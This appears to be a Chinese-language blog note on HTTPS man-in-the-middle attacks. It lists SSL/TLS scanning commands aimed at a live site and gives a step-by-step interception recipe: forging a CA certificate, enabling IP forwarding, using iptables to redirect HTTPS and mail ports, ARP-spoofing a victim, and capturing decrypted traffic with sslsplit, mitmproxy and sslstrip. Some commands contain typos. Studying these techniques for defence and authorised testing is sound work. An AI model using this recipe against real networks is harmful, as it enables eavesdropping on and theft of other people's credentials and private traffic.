https中間人攻擊.md
阿新 • • 發佈:2022-05-25
https中間人攻擊
使用tls/ssl方法進行加密傳輸
http攻擊方法
- 降級攻擊
- 解密攻擊(明文,證書偽造)
- 協議漏洞,實現漏洞,配置不嚴格
openssl
openssl s_client -connect www.baidu.com:443
****
sslscan
自動識別ssl配置錯誤,過期協議
預設檢查 CRIME heartbleed 漏洞
綠色: 安全 紅色:注意
sslscan -tlsall www.baidu.com:443
sslscan --show-certificate --no-ciphersuites www.baidu.com:443
sslyze
sslyze --regular www.baidu.com
nmap
nmap --script=ssl-enum-ciphers.nse www.baidu.com
攻擊型別
二層攻擊
三層攻擊
攻擊前提:
客戶端信任偽造證書
攻擊端控制證書頒發機構
客戶端禁止了顯示證書頒發錯誤
arp實現
sslspit
透明ssl/tls中間人攻擊 生成本地證書私鑰: openssl genrsa -out ca.key 2048 利用私鑰生成證書: openssl req -new -509 -days 1096 -key ca.key -out ca.crt 開啟os的路由轉發功能: sysctl -w net.ipv4.ip_forward=1 關閉80,443端口占用程式: netstat -ptanu | grep :80 開啟埠轉發: iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080 iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443 iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443 #MSA iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443 #SMTPS iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443 #IMAPS iptables -t nat -A PREROUTING -p tcp --dport 995 -j REDIRECT --to-ports 8443 #POP3S iptables -t nat -L arp欺騙: arpspoof -i eth0 -t 1.1.1.2 -r 1.1.1.1 啟動SSLsplit: mkdir -p test/log sslsplit -D -l connect.log -j /root/test -S log/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
Mitmproxy
mitmproxy -T --host -w mitmproxy.log
sslstrip
強制客戶端到中間人流量變為明文
ssltrip -l 8080